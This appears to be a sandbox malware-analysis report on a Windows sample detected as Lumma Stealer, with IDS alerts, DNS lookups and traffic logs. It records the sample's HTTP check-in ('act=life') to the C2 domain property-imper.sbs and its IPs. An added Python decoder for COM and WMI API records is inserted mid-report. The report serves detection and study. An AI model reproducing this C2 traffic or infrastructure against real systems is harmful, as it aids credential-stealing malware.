euxtkkub | 0x307000 | 0x1a1000 | 0x1a0c00 | 3fe9fe7829b3edb0d18a69967f7471c8 | False | 0.9940000281193762 | TeX packed font data (\305\027p\300\332\317q\230\305\227\251qK) | 7.953806103846816 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ttmnjqdd | 0x4a8000 | 0x1000 | 0x400 | 420113b878fcd4ce16e75cf9231f55e3 | False | 0.791015625 | data | 6.141580074552435 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4a9000 | 0x3000 | 0x2200 | 5a6d08ccd57d47d3a90737add7216340 | False | 0.06916360294117647 | DOS executable (COM) | 0.8818299280738513 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x4a78b0 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-24T20:01:19.775771+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49704 | 104.21.33.116 | 443 | TCP
2024-11-24T20:01:20.801399+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49704 | 104.21.33.116 | 443 | TCP
2024-11-24T20:01:20.801399+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49704 | 104.21.33.116 | 443 | TCP
2024-11-24T20:01:21.942911+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49705 | 104.21.33.116 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 20:01:18.098196030 CET | 64590 | 53 | 192.168.2.8 | 1.1.1.1
Nov 24, 2024 20:01:18.367687941 CET | 53 | 64590 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 24, 2024 20:01:18.098196030 CET | 192.168.2.8 | 1.1.1.1 | 0x9001 | Standard query (0) | property-imper.sbs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 24, 2024 20:01:18.367687941 CET | 1.1.1.1 | 192.168.2.8 | 0x9001 | No error (0) | property-imper.sbs | | 104.21.33.116 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 20:01:18.367687941 CET | 1.1.1.1 | 192.168.2.8 | 0x9001 | No error (0) | property-imper.sbs | | 172.67.162.84 | A (IP address) | IN (0x0001) | false
  • property-imper.sbs
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 104.21.33.116 | 443 | 3360 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 19:01:19 UTC | 265 | OUT | POST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: property-imper.sbs
2024-11-24 19:01:19 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-11-24 19:01:20 UTC | 1016 | IN | HTTP/1.1 200 OK
                            Date: Sun, 24 Nov 2024 19:01:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=9nfcb740fa6p0igi0e6e5nughs; expires=Thu, 20-Mar-2025 12:47:59 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nDIBuiNrg%2BWPha6y2N8j1BqJIq1T5BL71JdBwJd2OyjFC8TjlRVVrT%2B5GJZ4nzEKk2ZK1x7%2BoyX3qgQcw0UhLZmqKymFY3p7Ir7b8Yb5HBz32aM5PVX0L09C9vna9Yj%2FhhqgdG8%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8e7ba5a08b428c5d-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1839&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1571582&cwnd=207&unsent_bytes=0&cid=28b7dd8013a7f761&ts=1039&x=0"
                            2024-11-24 19:01:20 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                            Data Ascii: 2ok
                            2024-11-24 19:01:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0

                            Target ID: 0
                            Start time: 14:01:16
                            Start date: 24/11/2024
                            Path: C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit): true
                            Commandline: "C:\Users\user\Desktop\file.exe"
                            Imagebase: 0x2f0000
                            File size: 1'878'528 bytes
                            MD5 hash: 542CD6EF81CDD42518BA3BAF58EB90E6
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: low
                            Has exited: true

                              Execution Graph

                              Execution Coverage: 3.5%
                              Dynamic/Decrypted Code Coverage: 0%
                              Signature Coverage: 66.2%
                              Total number of Nodes: 234
                              Total number of Limit Nodes: 14

                              Control-flow Graph

                              APIs
                              • SysAllocString.OLEAUT32(13C511C2), ref: 003291B6
                              • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 003291FC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: AllocBlanketProxyString
                              • String ID: =3$E!q#$E!q#$Lgfe$\$IK
                              • API String ID: 900851650-3206278330
                              • Opcode ID: a441557e4afccff7a63d54f56e123ef6c3353bb5ca9216f47607e4644e19c6f8
                              • Instruction ID: ad7d7ce8e89c810ea8082668df98b09bd17ec3b860fb4bcccbc47106e8f6f970
                              • Opcode Fuzzy Hash: a441557e4afccff7a63d54f56e123ef6c3353bb5ca9216f47607e4644e19c6f8
                              • Instruction Fuzzy Hash: 8D226371A083209FE325CF20DC81B6BBBEAEF85354F158A1DF5859B281D774E905CB92

                              Control-flow Graph

                              Strings
                              Similarity
                              • API ID:
                              • String ID: ()$+S7U$,_"Q$0C%E$1A3C5A9CB541A822D7CBBD6DF28D3732$7W"i$;[*]$<KuM$N3F5$S7HI$property-imper.sbs$y?O1$c]e$gy
                              • API String ID: 0-925830438
                              • Opcode ID: 8f477ccf1d2426281e919e131445cb61005e18ffa5406aa45fb8b779d0ad1521
                              • Instruction ID: 96890c8ec350d6594eafe5c6df6ffaf88bd08a824fceb9d4fe16747920779896
                              • Opcode Fuzzy Hash: 8f477ccf1d2426281e919e131445cb61005e18ffa5406aa45fb8b779d0ad1521
                              • Instruction Fuzzy Hash: 0B121EB15583C68ED3358F25C495BEFFBE2ABD2304F18896CC4DA5B256C770090ACB92

                              Control-flow Graph

                              APIs
                              • ExitProcess.KERNEL32(00000000), ref: 002F8CB6
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              • Opcode ID: c6779f4e862f807658b4e3108dc50bb74b84832ae78fdc2c9c0e9422dfd878d8
                              • Instruction ID: 2b28d1c01dc2020860de0689f8151178e1f4fb5661d1875c6d668866bae56959
                              • Opcode Fuzzy Hash: c6779f4e862f807658b4e3108dc50bb74b84832ae78fdc2c9c0e9422dfd878d8
                              • Instruction Fuzzy Hash: 06710573B547050BC70CDEBADC9236BF6D6ABC8714F09D83D6988DB390EAB89C054685

                              Control-flow Graph

                              APIs
                              • LdrInitializeThunk.NTDLL(0032BA46,?,00000010,00000005,00000000,?,00000000,?,?,00309158,?,?,003019B4), ref: 0032DF9E
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                              Control-flow Graph

                              APIs
                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0032B84E
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 50493cf6301814da4beab4b6e627a83a1baf88742d07f832d1985d2a8ed5bf30
                              • Instruction ID: 73c7f8417231fb65aea1adcead5207470b03d887a0cce191eee344c602ae426b
                              • Opcode Fuzzy Hash: 50493cf6301814da4beab4b6e627a83a1baf88742d07f832d1985d2a8ed5bf30
                              • Instruction Fuzzy Hash: F4017633A457180BC301AE7CDC9464ABB96EFD9324F2A063CE5D4873D1DA31990A8295

                              Control-flow Graph

                              APIs
                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 002FCEC6
                              Similarity
                              • API ID: InitializeSecurity
                              • String ID:
                              • API String ID: 640775948-0
                              • Opcode ID: ac99b37ff8c97d55cca157d106588f0098b09b27bb8556b998fb04a92079035d
                              • Instruction ID: fcf9045644cb2b75c459b3e2b54238c6a2a6e0bf1d777b4594a087a2ce8cf6bb
                              • Opcode Fuzzy Hash: ac99b37ff8c97d55cca157d106588f0098b09b27bb8556b998fb04a92079035d
                              • Instruction Fuzzy Hash: 59D012357E8742BAF9798608ACA3F2422198706F68F305B08B332FE2E2C9D07142850C

                               Control-flow Graph
                               control_flow_graph 232 2fce80-2fceb0 CoInitializeEx
                              APIs
                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 002FCE94
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                               • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: Initialize
                              • String ID:
                              • API String ID: 2538663250-0
                              • Opcode ID: 5c511be5bbb2ad09224f0b903549db7951a37c5bad1eccffe0aa01cba6b8d629
                              • Instruction ID: ca09d98975e744d4fea1cbdb68ff78e017069b62ab6b31669e76d72f3b0512c4
                              • Opcode Fuzzy Hash: 5c511be5bbb2ad09224f0b903549db7951a37c5bad1eccffe0aa01cba6b8d629
                              • Instruction Fuzzy Hash: CED0A7212A46487BD118A21CEC97F27365D8703754F445636A662CA2D2D95169158065

                               Control-flow Graph
                               control_flow_graph 276 2fd7d2-2fd7d8 CoUninitialize 277 2fd7da-2fd7e1 276->277
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                               • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: Uninitialize
                              • String ID:
                              • API String ID: 3861434553-0
                              • Opcode ID: 48a59fa3c8f708484433f095e3d362d40dff9596cc1c5e972a09ac2fc74dae2e
                              • Instruction ID: b979425f5eaf5565cf15aaee525b351b37829593de3ad8fb6037f78017de3eb6
                              • Opcode Fuzzy Hash: 48a59fa3c8f708484433f095e3d362d40dff9596cc1c5e972a09ac2fc74dae2e
                              • Instruction Fuzzy Hash: 92B01237B41008544B0014A47C010CDF318D2801357006B73C21CD2000D62601244180
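The three records above (CoInitializeEx at 002FCE94, CoInitializeSecurity at 002FCEC6, CoUninitialize in graph 276) are the COM set-up a WMI client performs before it can call IWbemServices, which is how this sample reaches the Win32_BIOS and Win32_BaseBoard queries flagged in the signature list. The report only shows raw hex arguments, so the following Python decoder, an added example and not part of the Joe Sandbox report, parses lines in the report's `Api.MODULE(hex,...), ref: hex` form, names the dwCoInit, dwAuthnLevel and dwImpLevel values from the Windows SDK constants, and checks for the CoInitializeEx-then-CoInitializeSecurity-with-impersonation shape. The two API lines embedded as input are copied from this report; the treatment of the logged `000000FF` for cAuthSvc as the documented -1 sentinel is an assumption about how the logger rendered that value.

```python
"""Decode Joe Sandbox API-call records for CoInitializeEx / CoInitializeSecurity
and flag the COM-security prologue a WMI client needs.  Added example, not report
code; constants are from objbase.h / rpcdce.h in the Windows SDK."""
import re
from dataclasses import dataclass, field

# Constructed input: the two API lines copied from this report's disassembly section.
API_LINES = [
    "CoInitializeEx.COMBASE(00000000,00000002), ref: 002FCE94",
    "CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,"
    "00000003,00000000,00000000,00000000), ref: 002FCEC6",
]

LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[0-9A-Fa-f,]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# dwCoInit bit flags; a value with bit 0x2 clear is COINIT_MULTITHREADED.
COINIT_FLAGS = {0x2: "COINIT_APARTMENTTHREADED", 0x4: "COINIT_DISABLE_OLE1DDE",
                0x8: "COINIT_SPEED_OVER_MEMORY"}
AUTHN_LEVELS = {0: "RPC_C_AUTHN_LEVEL_DEFAULT", 1: "RPC_C_AUTHN_LEVEL_NONE",
                2: "RPC_C_AUTHN_LEVEL_CONNECT", 3: "RPC_C_AUTHN_LEVEL_CALL",
                4: "RPC_C_AUTHN_LEVEL_PKT", 5: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY",
                6: "RPC_C_AUTHN_LEVEL_PKT_PRIVACY"}
IMP_LEVELS = {0: "RPC_C_IMP_LEVEL_DEFAULT", 1: "RPC_C_IMP_LEVEL_ANONYMOUS",
              2: "RPC_C_IMP_LEVEL_IDENTIFY", 3: "RPC_C_IMP_LEVEL_IMPERSONATE",
              4: "RPC_C_IMP_LEVEL_DELEGATE"}
# Parameter order of CoInitializeSecurity (combaseapi.h), nine arguments.
COSEC_PARAMS = ["pSecDesc", "cAuthSvc", "asAuthSvc", "pReserved1", "dwAuthnLevel",
                "dwImpLevel", "pAuthList", "dwCapabilities", "pReserved3"]


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    decoded: dict = field(default_factory=dict)


def parse_api_line(line: str) -> ApiCall:
    """Turn 'Api.MODULE(hex,hex,...), ref: hex' into an ApiCall with integer args."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised API line: {line!r}")
    args = [int(a, 16) for a in m.group("args").split(",") if a]
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def decode_coinitialize_ex(args):
    """Name the dwCoInit flags; pvReserved is kept as hex."""
    reserved, flags = args[0], args[1]
    names = [n for bit, n in COINIT_FLAGS.items() if flags & bit]
    if not flags & 0x2:
        names.insert(0, "COINIT_MULTITHREADED")
    return {"pvReserved": hex(reserved), "dwCoInit": "|".join(names)}


def decode_coinitialize_security(args):
    """Name every CoInitializeSecurity parameter; levels get 'NAME (value)'."""
    if len(args) != len(COSEC_PARAMS):
        raise ValueError("CoInitializeSecurity takes 9 arguments")
    raw = dict(zip(COSEC_PARAMS, args))
    out = {k: hex(v) for k, v in raw.items()}
    # Assumption: the logger rendered the documented -1 sentinel (let COM choose
    # the authentication services) as 000000FF; accept both renderings.
    if raw["cAuthSvc"] in (0xFF, 0xFFFFFFFF):
        out["cAuthSvc"] = "-1 (COM selects authentication services)"
    out["dwAuthnLevel"] = f'{AUTHN_LEVELS.get(raw["dwAuthnLevel"], "unknown")} ({raw["dwAuthnLevel"]})'
    out["dwImpLevel"] = f'{IMP_LEVELS.get(raw["dwImpLevel"], "unknown")} ({raw["dwImpLevel"]})'
    return out


DECODERS = {"CoInitializeEx": decode_coinitialize_ex,
            "CoInitializeSecurity": decode_coinitialize_security}


def decode(call: ApiCall) -> ApiCall:
    """Attach a named-parameter view for the APIs this example understands."""
    dec = DECODERS.get(call.api)
    if dec:
        call.decoded = dec(call.args)
    return call


def is_wmi_client_prologue(calls) -> bool:
    """True when CoInitializeEx precedes a CoInitializeSecurity whose impersonation
    level is IMPERSONATE or DELEGATE, the level WMI clients set before connecting
    to a namespace and issuing queries such as SELECT * FROM Win32_BIOS."""
    seen_init = False
    for c in calls:
        if c.api == "CoInitializeEx":
            seen_init = True
        elif c.api == "CoInitializeSecurity" and seen_init and c.args[5] >= 3:
            return True
    return False


if __name__ == "__main__":
    calls = [decode(parse_api_line(line)) for line in API_LINES]
    for c in calls:
        print(f"{c.api} @ {c.ref:08X}: {c.decoded}")
    print("WMI client prologue:", is_wmi_client_prologue(calls))
```

The decoder only understands the two COM calls shown here; extend DECODERS with further signatures to cover the rest of a report's API list. Keep in mind that this prologue is also what any benign WMI-using program emits, so treat it as a lead to the subsequent IWbemServices::ExecQuery strings rather than as a verdict on its own.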
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                               • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                              • API String ID: 1279760036-1524723224
                              • Opcode ID: 72c0c279ce8485589524f096fc6ce72a14f3a86d21518e8677f31aa923fbc2d4
                              • Instruction ID: 27d464040fabb4c33dd56adf730c4a675d693c1531125e3a42ed32d53a477367
                              • Opcode Fuzzy Hash: 72c0c279ce8485589524f096fc6ce72a14f3a86d21518e8677f31aa923fbc2d4
                              • Instruction Fuzzy Hash: D3228EB550C3808FD32A8F28C4943AFBBE1AB99314F194D2DE5D98B392D7758885CB53
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                               • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                              • API String ID: 0-1787199350
                              • Opcode ID: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                              • Instruction ID: 5c3658a3dc5b696bd327294873b1296c567e58bebb1790a9eb90b1b5d73abe6c
                              • Opcode Fuzzy Hash: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                              • Instruction Fuzzy Hash: 54B1E57011C3858FD3158F2980607ABFFE1AF97784F1849ACE5D58B392D779884ACB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                               • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 1A3C5A9CB541A822D7CBBD6DF28D3732$DG$Ohs,$chs,$fhnf$fhnf$xy$su${}
                              • API String ID: 0-3908739105
                              • Opcode ID: c1b3168ba76250f4877fc23b92db1f1a7c23e11126551f3ee85181df081104a2
                              • Instruction ID: 45494c6f77e3729239939b697b64b3165134c2abfbe825dbb49589e98df06851
                              • Opcode Fuzzy Hash: c1b3168ba76250f4877fc23b92db1f1a7c23e11126551f3ee85181df081104a2
                              • Instruction Fuzzy Hash: 41E13772A583548BD328CF35C89176BFBE6ABD1314F198A3DE5E58B391D6348805CF82
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                               • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: -]$7o$:g-$@0kk$kq{<$kq{<$v_
                              • API String ID: 0-3521022252
                              • Opcode ID: 254d8d95d9ed893f44b8fbba7698ea423bee6b3b93d6c4f489a960a359645d79
                              • Instruction ID: 1b19daa4ce33d1ce8272943710471bd8b1b71f3d069a5a1d1dbfa229f56986e8
                              • Opcode Fuzzy Hash: 254d8d95d9ed893f44b8fbba7698ea423bee6b3b93d6c4f489a960a359645d79
                              • Instruction Fuzzy Hash: 0DB2E6F360C2009FE3046E2DEC8567AB7E9EF94720F1A893DEAC4C3744E67598458697
                              Strings
